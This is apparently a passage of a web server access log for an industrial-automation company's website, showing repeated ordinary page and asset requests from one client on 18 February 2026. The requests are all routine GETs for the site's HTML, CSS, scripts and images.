www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:31:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:01 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 